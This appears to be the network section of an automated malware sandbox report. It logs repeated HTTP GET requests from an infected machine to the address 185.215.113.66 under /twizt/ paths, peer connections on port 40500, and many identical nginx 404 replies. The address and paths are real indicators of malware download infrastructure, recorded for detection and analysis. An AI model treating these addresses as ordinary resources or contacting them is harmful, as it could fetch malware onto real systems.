                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global traffic | TCP traffic: 192.168.2.7:49764 -> 176.194.22.84:40500
                          Source: global traffic | UDP traffic: 192.168.2.7:57861 -> 105.106.149.0:40500
                          Source: global traffic | UDP traffic: 192.168.2.7:57861 -> 89.236.217.87:40500
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:38 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:39 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:41 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:43 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:44 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:45 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: keep-alive | Content-Encoding: gzip | Data Raw: (gzip-compressed chunked body, not printable; omitted)
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:48 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:49 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:50 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:51 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:52 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 15 Aug 2022 16:31:56 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:06 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:14 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:17 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:20 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:21 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:23 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:24 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:25 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
